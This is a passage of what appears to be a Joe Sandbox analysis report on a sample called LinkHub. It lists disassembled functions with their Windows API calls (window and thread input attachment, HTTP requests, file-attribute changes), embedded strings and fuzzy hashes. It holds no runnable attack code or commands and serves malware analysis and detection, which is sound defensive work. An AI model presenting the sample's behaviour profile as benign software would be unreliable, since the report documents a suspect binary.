IIDFromString.OLE32(?,?), ref: 00C342A9
VariantInit.OLEAUT32(?), ref: 00C34341
VariantClear.OLEAUT32(?), ref: 00C34393

Strings

Failed to create object, xrefs: 00C34241, 00C342F7
Invalid parameter, xrefs: 00C342C2
NULL Pointer assignment, xrefs: 00C3427B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 41ec4587827fb33a4d680abbed38b303c8923cc177d7a82dbf82ed8da58dffc8
Instruction ID: a2e04fcc681162b48ce1237cf9100c377e681a4a33f728ced9ceb12ae37dbe14
Opcode Fuzzy Hash: 41ec4587827fb33a4d680abbed38b303c8923cc177d7a82dbf82ed8da58dffc8
Instruction Fuzzy Hash: 7A619C716187019FC314DF65C889BAFBBE8AF49714F000959F995AB2A1C770ED88CB92

Function 00C28BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C28C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C28CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C28CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C28D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C28DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28DDA

Strings

*.*, xrefs: 00C28DE0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 1e81a5efe17e975521e5167fd8b117b4871d60b87fbbe0cc975029097b1c62f5
Instruction ID: df3523020298356c7aa907c8a8096ca6778bb0ac7437f86694463d69bfcb87b6
Opcode Fuzzy Hash: 1e81a5efe17e975521e5167fd8b117b4871d60b87fbbe0cc975029097b1c62f5
Instruction Fuzzy Hash: F9617C725053159FCB10EF60D840AAEB7E8FF89310F04486EF99AC7251DB71EA49CB92

Function 00C23DCD Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C23E14

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C23E35

Strings

Incorrect parameters to object property !, xrefs: 00C23EF0
Error: , xrefs: 00C23F16
^ ERROR , xrefs: 00C23EE3
"%s" (%d) : ==> %s:, xrefs: 00C23F67
Line %d (File "%s"):, xrefs: 00C23E88, 00C23EA1
"%s" (%d) : ==> %s:%s%s, xrefs: 00C23F49

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: d5f450a4437a49f6e129ea3b6fe3f3f78f5ca7fd1298735ed0d046a12bce03a1
Instruction ID: ee9ca15aabb0f74502ef12661b8ddbc30864465ccb7314623a1d8f2cb14fc31b
Opcode Fuzzy Hash: d5f450a4437a49f6e129ea3b6fe3f3f78f5ca7fd1298735ed0d046a12bce03a1
Instruction Fuzzy Hash: 62519F7290021EABCB15EBE0DD56EFEB7B8AF04300F1041A5B505B2062EBB56F59DB61

Function 00C446E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00C44715
SetMenu.USER32(?,00000000), ref: 00C44724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C447AC
IsMenu.USER32(?), ref: 00C447C0
CreatePopupMenu.USER32 ref: 00C447CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C447F7
DrawMenuBar.USER32 ref: 00C447FF

Strings

0, xrefs: 00C446F0
F, xrefs: 00C447EA

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 38c8f215fbc7730aad1c3139616fddaf4b08da4892d9df96a28e7c0cf6d36835
Instruction ID: d021032ec402ff8823ab22d327a107b1cf7010aa679794f5f33a8971ece27d99
Opcode Fuzzy Hash: 38c8f215fbc7730aad1c3139616fddaf4b08da4892d9df96a28e7c0cf6d36835
Instruction Fuzzy Hash: B6417CB9A01205EFDB18DF64D844FAE7BB5FF4A314F244028FA5697391D770AA10CB50

Function 00C1282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C14620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C128B1
GetDlgCtrlID.USER32 ref: 00C128BC
GetParent.USER32 ref: 00C128D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C128DB
GetDlgCtrlID.USER32(?), ref: 00C128E4
GetParent.USER32(?), ref: 00C128F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C128FB

Strings

ListBox, xrefs: 00C1286E
ComboBox, xrefs: 00C12839

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 56c6c7edaa60cbb0e92c710135160432803e8fcc39f4aebedb0b4bef567eb4d4
Instruction ID: d84faea5088050e33d56a59aab1ac43c57c90bd40cf5b2d3570aa99a370ce2e6
Opcode Fuzzy Hash: 56c6c7edaa60cbb0e92c710135160432803e8fcc39f4aebedb0b4bef567eb4d4
Instruction Fuzzy Hash: 3C21D779900118BBCF04AFA4CC85EFEBBB8FF06350F004156B962932D1DB794959EB60

Function 00C1290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C14620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C12990
GetDlgCtrlID.USER32 ref: 00C1299B
GetParent.USER32 ref: 00C129B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C129BA
GetDlgCtrlID.USER32(?), ref: 00C129C3
GetParent.USER32(?), ref: 00C129D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C129DA

Strings

ListBox, xrefs: 00C1294F
ComboBox, xrefs: 00C1291A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: b77ab3427ee4355bf7a7ce42086c04964723100d821e38281f803d305832ea38
Instruction ID: cf529e0e22d403b3e15e4d9dc45ce0313beb1c3cd64dd85cb1e4980b86549e74
Opcode Fuzzy Hash: b77ab3427ee4355bf7a7ce42086c04964723100d821e38281f803d305832ea38
Instruction Fuzzy Hash: F321A479900118BBCF05AFA4CC45FFEBBB8EF06340F004456B95197191C7794959EB60

Function 00C444BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C44539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C4453C
GetWindowLongW.USER32(?,000000F0), ref: 00C44563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C44586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C445FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C44648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C44663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C4467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C44692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C446AF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 4b9f4496acd06d006cba5b972e5d86f59522500da41bff7e8cbbf718cbe2bb80
Instruction ID: 731c25fffbc6dac6a5230fc3c22c8eaa34b75643728e55d32bebbb56801945f4
Opcode Fuzzy Hash: 4b9f4496acd06d006cba5b972e5d86f59522500da41bff7e8cbbf718cbe2bb80
Instruction Fuzzy Hash: BC617975A00258AFDB24DFA8CC81FEE77B8FB09310F20015AFA14A72A1C774AA45DB50

Function 00C1BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C1BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C1ABA8,?,00000001), ref: 00C1BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00C1BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C1ABA8,?,00000001), ref: 00C1BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C1BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C1ABA8,?,00000001), ref: 00C1BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C1ABA8,?,00000001), ref: 00C1BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C1ABA8,?,00000001), ref: 00C1BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C1ABA8,?,00000001), ref: 00C1BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C1ABA8,?,00000001), ref: 00C1BBE4

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 7212e64edc1b269d9759f1ff06c7a67f26d8f978c810c33d1bc751e264b27ef2
Instruction ID: f99720bcf73f83b971eca93e73c9126fdcaac16e86c59b6dfba58309f4cded43
Opcode Fuzzy Hash: 7212e64edc1b269d9759f1ff06c7a67f26d8f978c810c33d1bc751e264b27ef2
Instruction Fuzzy Hash: 1231D076908305AFDB15AB24DC88FEE37A9FB0A312F114009FA06C71A4D7B49E80DF24

Function 00BE2FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE3007

Part of subcall function 00BE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEDB51,?,00000000,?,00000000,?,00BEDB78,?,00000007,?,?,00BEDF75,?), ref: 00BE2D4E
Part of subcall function 00BE2D38: GetLastError.KERNEL32(?,?,00BEDB51,?,00000000,?,00000000,?,00BEDB78,?,00000007,?,?,00BEDF75,?,?), ref: 00BE2D60

_free.LIBCMT ref: 00BE3013
_free.LIBCMT ref: 00BE301E
_free.LIBCMT ref: 00BE3029
_free.LIBCMT ref: 00BE3034
_free.LIBCMT ref: 00BE303F
_free.LIBCMT ref: 00BE304A
_free.LIBCMT ref: 00BE3055
_free.LIBCMT ref: 00BE3060
_free.LIBCMT ref: 00BE306E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cf8b0287b5b5490a6c753442b50ca58580141ed706efdb212f89fd292e8d6deb
Instruction ID: 4786a31601d3eeac3622d75a8756e5c880d67161c3ccff53430c0f81981f932b
Opcode Fuzzy Hash: cf8b0287b5b5490a6c753442b50ca58580141ed706efdb212f89fd292e8d6deb
Instruction Fuzzy Hash: D111747650014CAFCB01EF96CC42DDD3BA9EF05351B9185E5FA089B222DB31EA619B90

Function 00C28835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C289F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28A06
GetFileAttributesW.KERNEL32(?), ref: 00C28A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00C28A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C28AF5

Strings

*.*, xrefs: 00C28AAB

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 14c0357c1a9601b3c1614cab1c60b1e2a1ca421b106653c81c97f70320ba0220
Instruction ID: eb1f936f911d0c98b6392292c696a104a7cd292383f1e82d1e6a1ab5e4162a2f
Opcode Fuzzy Hash: 14c0357c1a9601b3c1614cab1c60b1e2a1ca421b106653c81c97f70320ba0220
Instruction Fuzzy Hash: 0181D0719053249BCB24EF14D444ABEB3E8BF84310F58482AF895D7650EF74EA89DB92

Function 00BB7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00BB74D7

Part of subcall function 00BB7567: GetClientRect.USER32(?,?), ref: 00BB758D
Part of subcall function 00BB7567: GetWindowRect.USER32(?,?), ref: 00BB75CE
Part of subcall function 00BB7567: ScreenToClient.USER32(?,?), ref: 00BB75F6

GetDC.USER32 ref: 00BF6083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BF6096
SelectObject.GDI32(00000000,00000000), ref: 00BF60A4
SelectObject.GDI32(00000000,00000000), ref: 00BF60B9
ReleaseDC.USER32(?,00000000), ref: 00BF60C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BF6152

Strings

U, xrefs: 00BF6021

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: b437782d7a6c326be9c2053594e1249be0bd7df7b4ab60c44798b3e58d79ef07
Instruction ID: 68999d885b41d2a418d411b00cd9bf88fc8c83f4d2711f918240889349039335
Opcode Fuzzy Hash: b437782d7a6c326be9c2053594e1249be0bd7df7b4ab60c44798b3e58d79ef07
Instruction Fuzzy Hash: E471B031500209EFCF259F64C884AFA7BF5FF45321F2446A9EE556B2A6CB318948EB50

Function 00C4955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB24B0

Part of subcall function 00BB19CD: GetCursorPos.USER32(?), ref: 00BB19E1
Part of subcall function 00BB19CD: ScreenToClient.USER32(00000000,?), ref: 00BB19FE
Part of subcall function 00BB19CD: GetAsyncKeyState.USER32(00000001), ref: 00BB1A23
Part of subcall function 00BB19CD: GetAsyncKeyState.USER32(00000002), ref: 00BB1A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00C495C7
ImageList_EndDrag.COMCTL32 ref: 00C495CD
ReleaseCapture.USER32 ref: 00C495D3
SetWindowTextW.USER32(?,00000000), ref: 00C4966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C49681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00C4975B

Strings

@GUI_DROPID, xrefs: 00C496AD
@GUI_DRAGFILE, xrefs: 00C496F6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 933c136d7ad15c14fdc6ad79502286bd27a2d974fa233eec89b43cd012436733
Instruction ID: 4bd43ff3378f0490279f55b0f60d0fe6888a8e5fdd3e41c776b406b002e4dbe8
Opcode Fuzzy Hash: 933c136d7ad15c14fdc6ad79502286bd27a2d974fa233eec89b43cd012436733
Instruction Fuzzy Hash: 47518C75604310AFD704EF14CC5AFAE77E4FB88714F400A69F996972E2DBB09908CB52

Function 00C2CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C2CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C2CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C2CD0F
GetLastError.KERNEL32 ref: 00C2CD67
SetEvent.KERNEL32(?), ref: 00C2CD7B
InternetCloseHandle.WININET(00000000), ref: 00C2CD86

Strings

, xrefs: 00C2CD00

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: e670feeac9e6de7bdd046bcb29fde75acaef8038d9bdf6ad6d506d7d97ef76e0
Instruction ID: 0bbe76e6a238dce20a09e3ea8565a9760a570de8c75366c95062d55b3ea83958
Opcode Fuzzy Hash: e670feeac9e6de7bdd046bcb29fde75acaef8038d9bdf6ad6d506d7d97ef76e0
Instruction Fuzzy Hash: AB315AB5600618AFD721AF65ACC8BAF7BFCEB45740F10452AF456D3600DB34EE059BA0

Function 00C1A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BF55AE,?,?,Bad directive syntax error,00C4DCD0,00000000,00000010,?,?), ref: 00C1A236
LoadStringW.USER32(00000000,?,00BF55AE,?), ref: 00C1A23D

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C1A301

Strings

Error: , xrefs: 00C1A2CF
%s (%d) : ==> %s.: %s %s, xrefs: 00C1A26B
Line %d (File "%s"):, xrefs: 00C1A2A7
Line %d:, xrefs: 00C1A28C
., xrefs: 00C1A2E7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 36860a3db0a445597cda78beab53566754b2c591a10e999956c2105578537e72
Instruction ID: b46398a37e9bbaa6ba02ee1c1d26ffcf8fd1806892434769920306747a48e666
Opcode Fuzzy Hash: 36860a3db0a445597cda78beab53566754b2c591a10e999956c2105578537e72
Instruction Fuzzy Hash: 2C21233190021EEFCF15AF90CC46FFE7B75BF18700F0444A9B519650A2D7B59658EB51

Function 00C129EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C129F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00C12A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C12A9A

Strings

largeicons, xrefs: 00C12A2E
details, xrefs: 00C12A48
SHELLDLL_DefView, xrefs: 00C12A19
smallicons, xrefs: 00C12A62
list, xrefs: 00C12A7C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
